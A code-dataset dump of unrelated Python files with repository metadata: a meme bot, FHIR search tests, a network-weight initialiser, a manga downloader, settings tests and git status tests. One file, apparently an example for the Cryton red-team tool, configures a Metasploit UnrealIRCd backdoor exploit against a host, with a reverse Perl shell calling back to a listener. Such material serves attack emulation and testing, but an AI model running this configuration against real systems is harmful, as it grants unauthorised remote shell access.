hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | 
qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e86aaa563073dbb7b8cafea3ea50f5fd2ee8e954 | 2,081 | py | Python | meme_publisher.py | MrUpyachka/bothometh | f806a3d711efe03c49833effdb7e152dda0dbeb9 | [
"Apache-2.0"
] | 1 | 2021-03-06T17:20:12.000Z | 2021-03-06T17:20:12.000Z | meme_publisher.py | MrUpyachka/bothometh | f806a3d711efe03c49833effdb7e152dda0dbeb9 | [
"Apache-2.0"
] | 2 | 2021-03-06T16:48:00.000Z | 2021-03-06T16:51:55.000Z | meme_publisher.py | MrUpyachka/bothometh | f806a3d711efe03c49833effdb7e152dda0dbeb9 | [
"Apache-2.0"
] | null | null | null | import random

import praw
from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton

import logger

LOG = logger.LOG
QUERY_PREFIX = 'meme '


class MemePublisher:
    def __init__(self, reddit_client_id, reddit_client_secret, reddit_client_user_agent, settings):
        self.reddit = praw.Reddit(client_id=reddit_client_id,
                                  client_secret=reddit_client_secret,
                                  user_agent=reddit_client_user_agent)
        self.topic = settings['topic']
        self.queries = settings['queries']
        self.memes_cache = {}

    def refresh_memes(self, query):
        LOG.info("No more memes, getting new ones...")
        sub_reddit = self.reddit.subreddit(self.topic) \
            .search(query, sort="top", limit=200)
        loaded_memes = list(sub_reddit)
        if len(loaded_memes) == 0:
            LOG.info("No memes found")
            self.memes_cache[query] = loaded_memes
        else:
            LOG.info("Got %s memes", len(loaded_memes))
            random.shuffle(loaded_memes)
            self.memes_cache[query] = loaded_memes
        return loaded_memes

    def get_query_memes_cache(self, query):
        if query in self.memes_cache:
            return self.memes_cache[query]
        return self.refresh_memes(query)

    def get_reddit_meme(self, query):
        query_memes_cache = self.get_query_memes_cache(query)
        if not query_memes_cache:
            # list.pop() on an empty cache would raise IndexError, so guard first
            return None
        meme = query_memes_cache.pop()
        _ = meme.preview  # touch the lazy attribute so praw loads the submission
        result = {
            "code": 200,
            "post_link": meme.shortlink,
            "subreddit": self.topic,
            "title": meme.title,
            "url": meme.url,
            "ups": meme.ups,
        }
        return result

    def queries_markup(self):
        result = InlineKeyboardMarkup()
        result.row_width = len(self.queries)
        for query in self.queries:
            result.add(InlineKeyboardButton(query, callback_data=QUERY_PREFIX + query))
        return result
| 33.031746 | 99 | 0.59827 | 235 | 2,081 | 5.059574 | 0.319149 | 0.075694 | 0.058873 | 0.047939 | 0.094197 | 0.050463 | 0 | 0 | 0 | 0 | 0 | 0.004895 | 0.31283 | 2,081 | 62 | 100 | 33.564516 | 0.826573 | 0 | 0 | 0.113208 | 0 | 0 | 0.054301 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09434 | false | 0 | 0.075472 | 0 | 0.301887 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
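A minimal usage sketch for the class above; the credentials and settings values are placeholders, not taken from the repository:

publisher = MemePublisher(
    reddit_client_id='<client-id>',
    reddit_client_secret='<client-secret>',
    reddit_client_user_agent='bothometh/0.1',
    settings={'topic': 'memes', 'queries': ['cat', 'dog']},
)
meme = publisher.get_reddit_meme('cat')  # dict with post_link/title/url/ups, or None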
e86b225d9ee3942dac0a65af13306dbf88fb85f5 | 3,352 | py | Python | tests/dialects/test_elasticsearch.py | nazrulworld/fhirpath | 3b819870c57a0befcac18916a4d03b64c0e202ca | [
"Apache-2.0"
] | 25 | 2019-05-14T13:35:32.000Z | 2022-02-21T23:03:35.000Z | tests/dialects/test_elasticsearch.py | nazrulworld/fhirpath | 3b819870c57a0befcac18916a4d03b64c0e202ca | [
"Apache-2.0"
] | 29 | 2020-02-14T08:14:02.000Z | 2021-02-23T20:14:42.000Z | tests/dialects/test_elasticsearch.py | nazrulworld/fhirpath | 3b819870c57a0befcac18916a4d03b64c0e202ca | [
"Apache-2.0"
] | 4 | 2020-06-30T08:05:54.000Z | 2021-08-09T19:10:35.000Z | #!/usr/bin/env python
# _*_ coding: utf-8 _*_
"""Tests for `fhirpath` package."""
from fhirpath.search import Search
from fhirpath.search import SearchContext

__author__ = "Md Nazrul Islam<email2nazrul@gmail.com>"


async def test_raw_es_query_generation_from_search(engine, es_data):
    """Sample pytest test function with the pytest fixture as an argument."""
    context = SearchContext(engine, "Patient")
    params = (("gender", "male"), ("active", "true"), ("birthdate", "ge2010-01-01"))
    fhir_search = Search(context, params=params)
    result = fhir_search.build()
    engine.dialect.compile(
        result._query,
        calculate_field_index_name=engine.calculate_field_index_name,
        get_mapping=engine.get_mapping,
    )


async def test_dialect_generated_raw_query(es_data, engine):
    """Run dialect-compiled queries against Elasticsearch and check the hits."""
    search_context = SearchContext(engine, "Organization")
    params = (
        ("active", "true"),
        ("_lastUpdated", "2010-05-28T05:35:56+00:00"),
        ("_profile", "http://hl7.org/fhir/Organization"),
        ("identifier", "urn:oid:2.16.528.1|91654"),
        ("type", "http://hl7.org/fhir/organization-type|prov"),
        ("address-postalcode", "9100 AA"),
        ("address", "Den Burg"),
    )
    search_tool = Search(context=search_context, params=params)
    result_query = search_tool.build()
    compiled = search_context.engine.dialect.compile(
        result_query._query,
        calculate_field_index_name=engine.calculate_field_index_name,
        get_mapping=engine.get_mapping,
    )
    search_params = search_context.engine.connection.finalize_search_params(compiled)
    conn = engine.connection.raw_connection
    index_name = engine.get_index_name()
    result = conn.search(index=index_name, **search_params)
    assert len(result["hits"]["hits"]) == 1

    # test ContactPoint,HumanName
    search_context = SearchContext(engine, "Patient")
    params = (
        ("active", "true"),
        ("telecom", "2562000002"),
        ("given", "Eelector"),
        ("name", "Saint"),
        ("email", "demo1@example.com"),
        ("phone", "2562000002"),
        ("given:exact", "Eelector"),
    )
    search_tool = Search(context=search_context, params=params)
    result_query = search_tool.build()
    compiled = search_context.engine.dialect.compile(
        result_query._query,
        calculate_field_index_name=engine.calculate_field_index_name,
        get_mapping=engine.get_mapping,
    )
    search_params = search_context.engine.connection.finalize_search_params(compiled)
    result = conn.search(index=index_name, **search_params)
    assert len(result["hits"]["hits"]) == 1

    # test Quantity, Number
    search_context = SearchContext(engine, "ChargeItem")
    params = (
        ("quantity", "1"),
        ("factor-override", "0.8"),
        ("price-override", "40|EUR"),
    )
    search_tool = Search(context=search_context, params=params)
    result_query = search_tool.build()
    compiled = search_context.engine.dialect.compile(
        result_query._query,
        calculate_field_index_name=engine.calculate_field_index_name,
        get_mapping=engine.get_mapping,
    )
    search_params = search_context.engine.connection.finalize_search_params(compiled)
    result = conn.search(index=index_name, **search_params)
    assert len(result["hits"]["hits"]) == 1
| 34.916667 | 85 | 0.673329 | 384 | 3,352 | 5.609375 | 0.309896 | 0.096565 | 0.070566 | 0.085422 | 0.608171 | 0.521356 | 0.521356 | 0.521356 | 0.521356 | 0.521356 | 0 | 0.027584 | 0.188842 | 3,352 | 95 | 86 | 35.284211 | 0.764619 | 0.036396 | 0 | 0.472222 | 0 | 0 | 0.158867 | 0.024833 | 0 | 0 | 0 | 0 | 0.041667 | 1 | 0 | false | 0 | 0.027778 | 0 | 0.027778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
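The tests repeat the same build-compile-finalize-search pipeline three times; a condensed sketch of that pattern (the helper name is ours, everything else mirrors the calls above):

async def run_fhir_search(engine, resource_type, params):
    """Build a FHIR search, compile it for the ES dialect, and return raw hits."""
    context = SearchContext(engine, resource_type)
    query = Search(context, params=params).build()._query
    compiled = engine.dialect.compile(
        query,
        calculate_field_index_name=engine.calculate_field_index_name,
        get_mapping=engine.get_mapping,
    )
    search_params = engine.connection.finalize_search_params(compiled)
    return engine.connection.raw_connection.search(
        index=engine.get_index_name(), **search_params
    )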
e86be22c436cbbd53ee259d110b7ee833f5b7916 | 1,327 | py | Python | Fig5_grid/src_2comp/create_1Dtrack_network_random.py | TatsuyaHaga/preplaymodel_codes | 548df9ef5f85358fb03ed5f7f4cdc9e03a04bbf3 | [
"MIT"
] | 1 | 2019-02-26T04:15:16.000Z | 2019-02-26T04:15:16.000Z | Fig5_grid/src_2comp/create_1Dtrack_network_random.py | TatsuyaHaga/preplaymodel_codes | 548df9ef5f85358fb03ed5f7f4cdc9e03a04bbf3 | [
"MIT"
] | null | null | null | Fig5_grid/src_2comp/create_1Dtrack_network_random.py | TatsuyaHaga/preplaymodel_codes | 548df9ef5f85358fb03ed5f7f4cdc9e03a04bbf3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from shared_setting import *  # provides NE, Ninput, Nsominh, Ndndinh

import numpy
import csv

# soma exc synapse
EEmax = 18.0
EEwidth = 5.0
EEdistalmax = 2.0
w_rand = 0.0

# som<-som
x = numpy.arange(NE)
y = numpy.arange(NE)
z = numpy.meshgrid(x, y)
dif = numpy.abs(z[1] - z[0])
# dif = numpy.minimum(dif, NE - dif)  # ring
WEE = EEmax * numpy.exp(-0.5 * (dif / EEwidth)**2) + w_rand * numpy.random.randn(NE, NE)
WEE[WEE < 0.0] = 0.0
WEE[numpy.eye(NE, dtype=bool)] = 0.0  # no self-connections
numpy.savetxt("WEEsom_init.csv", WEE, delimiter=",")

# dnd<-input
WEE = EEdistalmax * numpy.random.rand(NE, Ninput)
numpy.savetxt("WEEdnd_init.csv", WEE, delimiter=",")

# inh connection
WEIsom_init = 4.0
WEIdnd_init = 0.0
WEIsom = numpy.random.rand(NE, Nsominh)
WEIsom = WEIsom_init * WEIsom / numpy.mean(WEIsom, axis=1, keepdims=True)
numpy.savetxt("WEIsom_init.csv", WEIsom, delimiter=",")
WEIdnd = numpy.random.rand(NE, Ndndinh)
WEIdnd = WEIdnd_init * WEIdnd / numpy.mean(WEIdnd, axis=1, keepdims=True)
numpy.savetxt("WEIdnd_init.csv", WEIdnd, delimiter=",")

WIEsom_init = 1.0 / Nsominh
WIEdnd_init = 1.0 / Ndndinh
WIEsom = numpy.random.rand(Nsominh, NE)
WIEsom = WIEsom_init * WIEsom / numpy.mean(WIEsom, axis=0, keepdims=True)
numpy.savetxt("WIEsom_init.csv", WIEsom, delimiter=",")
WIEdnd = numpy.random.rand(Ndndinh, NE)
WIEdnd = WIEdnd_init * WIEdnd / numpy.mean(WIEdnd, axis=0, keepdims=True)
numpy.savetxt("WIEdnd_init.csv", WIEdnd, delimiter=",")
| 24.574074 | 76 | 0.751319 | 226 | 1,327 | 4.336283 | 0.274336 | 0.012245 | 0.076531 | 0.097959 | 0.118367 | 0.118367 | 0 | 0 | 0 | 0 | 0 | 0.026677 | 0.067822 | 1,327 | 53 | 77 | 25.037736 | 0.765562 | 0.077619 | 0 | 0 | 0 | 0 | 0.078947 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
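The inhibitory blocks above all use the same trick: scale a random matrix so the mean weight along one axis equals a target value. A standalone check of that invariant:

import numpy as np

W = np.random.rand(5, 8)
W = 4.0 * W / np.mean(W, axis=1, keepdims=True)
assert np.allclose(W.mean(axis=1), 4.0)  # each row now averages exactly 4.0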
e87073f10682fe75475293de22e06d5ee8edf907 | 3,399 | py | Python | cli.py | amshelhack3r/MangaDownloader | 936b8e7d12085da023b9413a80226f88f3e982b8 | [
"MIT"
] | 1 | 2019-11-26T14:34:31.000Z | 2019-11-26T14:34:31.000Z | cli.py | amshelhack3r/MangaDownloader | 936b8e7d12085da023b9413a80226f88f3e982b8 | [
"MIT"
] | null | null | null | cli.py | amshelhack3r/MangaDownloader | 936b8e7d12085da023b9413a80226f88f3e982b8 | [
"MIT"
] | null | null | null | import os, sys
from pprint import pprint, pformat
from PyInquirer import prompt
from examples import custom_style_1
from scraper import Scraper
from downloader import Downloader
import logging

logging.basicConfig(filename='app.log', filemode='w', format='%(asctime)s - %(message)s', level=logging.INFO)


class cli():
    def __init__(self):
        print('Welcome to manga downloader')
        # check if the user has launched the app before; if not, create .env
        if not os.path.exists('.env'):
            self.first_launch()
        self.manga_obj = dict()
        self.chaptersToDownload()

    def first_launch(self):
        basedir = os.environ.get('HOME')
        # windows system
        if basedir is None:
            basedir = os.environ.get('HOMEPATH')
        with open('.env', 'w') as f:
            data = 'DOWNLOAD=' + basedir + "/Manga"
            f.write(data)
        return True

    def searchManga(self):
        questions = [
            {
                'type': 'input',
                'name': 'manga',
                'message': 'Enter the name of the manga you want to download?'
            },
        ]
        obj = prompt(questions, style=custom_style_1)
        self.manga_obj['typed_name'] = obj.get('manga')

    def searchResults(self):
        self.searchManga()
        manga_name = self.manga_obj.get('typed_name')
        choices = Scraper.getSearchResults(manga_name)
        if len(choices) < 1:
            print("MANGA NOT FOUND")
            sys.exit()
        questions = [
            {
                'type': 'list',
                'name': 'manga',
                'message': 'Search Results',
                'choices': choices.keys()
            },
        ]
        obj = prompt(questions, style=custom_style_1)
        self.manga_obj['manga'] = obj.get('manga')
        self.manga_obj['link'] = choices.get(obj['manga'])
        self.manga_obj['url_name'] = cli.getName(self.manga_obj.get('link'))

    def chaptersToDownload(self):
        self.searchResults()
        chapters = Scraper.getMangaInfo(self.manga_obj.get('url_name'))
        self.manga_obj['total'] = chapters.get('count')
        print('{} has {} chapters'.format(self.manga_obj.get('manga'), self.manga_obj.get('total')))
        questions = [
            {
                'type': 'input',
                'name': 'chapters',
                'message': 'Which Chapters you want to download? ie 1 or 1-7 or all'
            },
        ]
        obj = prompt(questions, style=custom_style_1)
        self.fetchChapters(obj.get('chapters'))

    def fetchChapters(self, chapters):
        if chapters.isnumeric():
            self.manga_obj['chapters'] = int(chapters)
        elif chapters.isalpha():
            # 'all': include every chapter from 1 through total
            self.manga_obj['chapters'] = range(1, self.manga_obj.get('total') + 1)
        elif len(chapters.split('-')) > 1:
            lst = [int(i) for i in chapters.split('-')]
            self.manga_obj['chapters'] = range(lst[0], lst[1] + 1)
        else:
            print('invalid input')
            return
        logging.info(pformat(self.manga_obj))
        Downloader(self.manga_obj)

    @classmethod
    def getName(cls, url):
        url_list = url.split('/')
        last_index = 0
        if len(url_list) > 0:
            last_index = len(url_list) - 1
        return url_list[last_index]
| 30.348214 | 109 | 0.542513 | 377 | 3,399 | 4.774536 | 0.31565 | 0.08 | 0.113333 | 0.05 | 0.148333 | 0.105 | 0.105 | 0.073889 | 0.052222 | 0.052222 | 0 | 0.007014 | 0.32892 | 3,399 | 111 | 110 | 30.621622 | 0.782113 | 0.010886 | 0 | 0.146067 | 0 | 0 | 0.139327 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078652 | false | 0.033708 | 0.078652 | 0 | 0.202247 | 0.05618 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
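The stored file defines the class but no entry point; a minimal guard to drive the interactive flow would be (assumed, not part of the file):

if __name__ == '__main__':
    cli()  # the constructor runs search, chapter selection, and download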
e87082df3e5ea0f0393354ac8dec7a95e15880ea | 3,020 | py | Python | plaidml/settings_test.py | redoclag/plaidml | 46d9e8b3f1e1093aab2a0dfa40b2e15e3cc7d314 | [
"Apache-2.0"
] | 4,535 | 2017-10-20T05:03:57.000Z | 2022-03-30T15:42:33.000Z | plaidml/settings_test.py | HOZHENWAI/plaidml | 46d9e8b3f1e1093aab2a0dfa40b2e15e3cc7d314 | [
"Apache-2.0"
] | 984 | 2017-10-20T17:16:09.000Z | 2022-03-30T05:43:18.000Z | plaidml/settings_test.py | HOZHENWAI/plaidml | 46d9e8b3f1e1093aab2a0dfa40b2e15e3cc7d314 | [
"Apache-2.0"
] | 492 | 2017-10-20T18:22:32.000Z | 2022-03-30T09:00:05.000Z | from __future__ import print_function

import os
import tempfile
import unittest
import uuid

import plaidml.exceptions
from plaidml import settings

VALID_CONF = r'''{
    "PLAIDML_CONFIG": "tmp",
    "PLAIDML_CONFIG_FILE": "/tmp",
    "PLAIDML_DEVICE_IDS": ["1", "3", "5"],
    "PLAIDML_EXPERIMENTAL": true,
    "PLAIDML_TELEMETRY": true
}
'''

INVALID_CONF = '{"PLAIDML_INVALID":"1"}'


class TestSettings(unittest.TestCase):

    def setUp(self):
        settings._setup_for_test()

    def testDefaults(self):
        self.assertEquals(settings.config, None)
        self.assertEquals(settings.device_ids, [])
        self.assertEquals(settings.experimental, False)
        self.assertEquals(settings.session, None)

    def testSetting(self):
        settings.config = 'test'
        settings.device_ids = ['1', '2']
        settings.experimental = True
        settings.session = "123"
        self.assertEquals(settings.config, 'test')
        self.assertEquals(settings.device_ids, ['1', '2'])
        self.assertEquals(settings.experimental, True)
        self.assertEquals(settings.session, "123")

    def testStartSession(self):
        with self.assertRaises(plaidml.exceptions.PlaidMLError):
            settings.start_session()
        settings.setup = True
        settings.start_session()
        settings._setup_for_test()
        settings.setup = False
        with self.assertRaises(plaidml.exceptions.PlaidMLError):
            settings.start_session()
        settings._setup_for_test()
        settings.experimental = True
        settings.start_session()
        u = uuid.UUID(settings.session)

    def testSettingsFileLoading(self):
        with tempfile.NamedTemporaryFile(mode='w', delete=False) as val:
            val.write(VALID_CONF)
        with tempfile.NamedTemporaryFile(mode='w', delete=False) as inv:
            inv.write(INVALID_CONF)

        # Explicit settings files should take precedence
        settings._setup_for_test(inv.name, inv.name)
        os.environ['PLAIDML_SETTINGS'] = val.name
        settings._load()
        self.assertEquals(settings.config, 'tmp')
        self.assertEquals(settings.experimental, True)
        self.assertEquals(settings.device_ids, ['1', '3', '5'])

        # User config should shadow system config
        settings._setup_for_test(val.name, inv.name)
        settings._load()
        self.assertEquals(settings.experimental, True)

        settings._setup_for_test('nottafile', inv.name)
        with self.assertRaises(plaidml.exceptions.OutOfRange):
            settings._load()

        os.remove(val.name)
        os.remove(inv.name)

    def testSettingsOverridesLoading(self):
        with tempfile.NamedTemporaryFile(mode='w', delete=False) as tf:
            tf.write(VALID_CONF)
        os.environ['PLAIDML_SETTINGS'] = tf.name
        os.environ['PLAIDML_CONFIG'] = 'other'
        settings._load()
        self.assertEquals(settings.config, 'other')
        os.remove(tf.name)


if __name__ == '__main__':
    unittest.main()
| 32.826087 | 72 | 0.658278 | 325 | 3,020 | 5.935385 | 0.236923 | 0.107828 | 0.161742 | 0.062208 | 0.414204 | 0.351996 | 0.26283 | 0.26283 | 0.138932 | 0.085018 | 0 | 0.007277 | 0.22649 | 3,020 | 91 | 73 | 33.186813 | 0.818493 | 0.028477 | 0 | 0.24 | 0 | 0 | 0.101672 | 0.030365 | 0 | 0 | 0 | 0 | 0.213333 | 1 | 0.08 | false | 0 | 0.093333 | 0 | 0.186667 | 0.013333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e870ac8178b0ee06b224d12e437fdb0f59fbde3f | 965 | py | Python | modules/mod_msf_module/example_with_payload.py | slashsec-edu/cryton-modules | 4826b5e353f64e3d915d2abaead93b234a296304 | [
"MIT"
] | null | null | null | modules/mod_msf_module/example_with_payload.py | slashsec-edu/cryton-modules | 4826b5e353f64e3d915d2abaead93b234a296304 | [
"MIT"
] | null | null | null | modules/mod_msf_module/example_with_payload.py | slashsec-edu/cryton-modules | 4826b5e353f64e3d915d2abaead93b234a296304 | [
"MIT"
] | null | null | null | from mod import execute, validate

args = {
    "module_type": "exploit",
    "module_name": "unix/irc/unreal_ircd_3281_backdoor",
    "module_options":
        {
            "RHOSTS": "172.28.128.99",
            "RPORT": "6697"
        },
    "payload_name": "cmd/unix/reverse_perl",  # optional
    "payload_options":  # optional
        {
            "LHOST": "172.28.128.3",
            "LPORT": "4444"
        },
    "run_as_job": False,  # optional
    # "session_id": "1",  # optional
    "create_named_session": "some_name",  # optional
    "exploit_timeout_in_sec": 30,  # default 60
    "exploit_retries": 3,  # default 1
    "session_timeout_in_sec": 10,  # default 60
}

try:
    val_output = validate(args)
    print("validate output: " + str(val_output))
except Exception as ex:
    print(ex)

try:
    ex_output = execute(args)
    print("execute output: " + str(ex_output))
except Exception as ex:
    print(ex)
| 26.805556 | 56 | 0.567876 | 111 | 965 | 4.702703 | 0.531532 | 0.045977 | 0.030651 | 0.088123 | 0.122605 | 0.122605 | 0.122605 | 0 | 0 | 0 | 0 | 0.061674 | 0.294301 | 965 | 35 | 57 | 27.571429 | 0.704846 | 0.109845 | 0 | 0.193548 | 0 | 0 | 0.365135 | 0.116608 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.032258 | 0 | 0.032258 | 0.129032 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
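The validate-then-execute pattern above can be folded into a small helper; `validate` and `execute` are the same functions imported from `mod`, while the wrapper itself is only a sketch:

def run_module(args):
    """Validate module arguments, then execute; returns (ok, output_or_error)."""
    try:
        validate(args)
    except Exception as ex:
        return False, 'validation failed: ' + str(ex)
    try:
        return True, execute(args)
    except Exception as ex:
        return False, 'execution failed: ' + str(ex)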
e8724a1db22a26938206e9c01a2bdbc830a7a858 | 2,073 | py | Python | jupyterlab_dvc/tests/test_status.py | SiddharthPant/jupyterlab-dvc | 084a0f03dcbfe6e58c783381f609bfe6c33bc10d | [
"BSD-3-Clause"
] | 2 | 2020-06-30T05:05:46.000Z | 2021-08-12T06:28:05.000Z | jupyterlab_dvc/tests/test_status.py | SiddharthPant/jupyterlab-dvc | 084a0f03dcbfe6e58c783381f609bfe6c33bc10d | [
"BSD-3-Clause"
] | 1 | 2021-05-11T12:21:01.000Z | 2021-05-11T12:21:01.000Z | jupyterlab_dvc/tests/test_status.py | SiddharthPant/jupyterlab-dvc | 084a0f03dcbfe6e58c783381f609bfe6c33bc10d | [
"BSD-3-Clause"
] | null | null | null | # python lib
import os
from unittest.mock import Mock, call, patch

import pytest
import tornado

# local lib
from jupyterlab_dvc.git import Git
from .testutils import FakeContentManager


@pytest.mark.asyncio
@pytest.mark.parametrize(
    "output,expected",
    [
        (
            (
                "A  notebook with spaces.ipynb",
                "M  notebook with λ.ipynb",
                "R  renamed_to_θ.py",
                "originally_named_π.py",
                "?? untracked.ipynb",
            ),
            [
                {
                    "x": "A",
                    "y": " ",
                    "to": "notebook with spaces.ipynb",
                    "from": "notebook with spaces.ipynb",
                },
                {
                    "x": "M",
                    "y": " ",
                    "to": "notebook with λ.ipynb",
                    "from": "notebook with λ.ipynb",
                },
                {
                    "x": "R",
                    "y": " ",
                    "to": "renamed_to_θ.py",
                    "from": "originally_named_π.py",
                },
                {
                    "x": "?",
                    "y": "?",
                    "to": "untracked.ipynb",
                    "from": "untracked.ipynb",
                },
            ],
        ),
        ((""), ([])),  # Empty answer
    ],
)
async def test_status(output, expected):
    with patch("jupyterlab_dvc.git.execute") as mock_execute:
        # Given
        root = "/bin"
        repository = "test_curr_path"
        mock_execute.return_value = tornado.gen.maybe_future(
            (0, "\x00".join(output) + "\x00", "")
        )

        # When
        actual_response = await Git(FakeContentManager(root)).status(
            current_path=repository
        )

        # Then
        mock_execute.assert_called_once_with(
            ["git", "status", "--porcelain", "-u", "-z"],
            cwd=os.path.join(root, repository),
        )
        assert {"code": 0, "files": expected} == actual_response
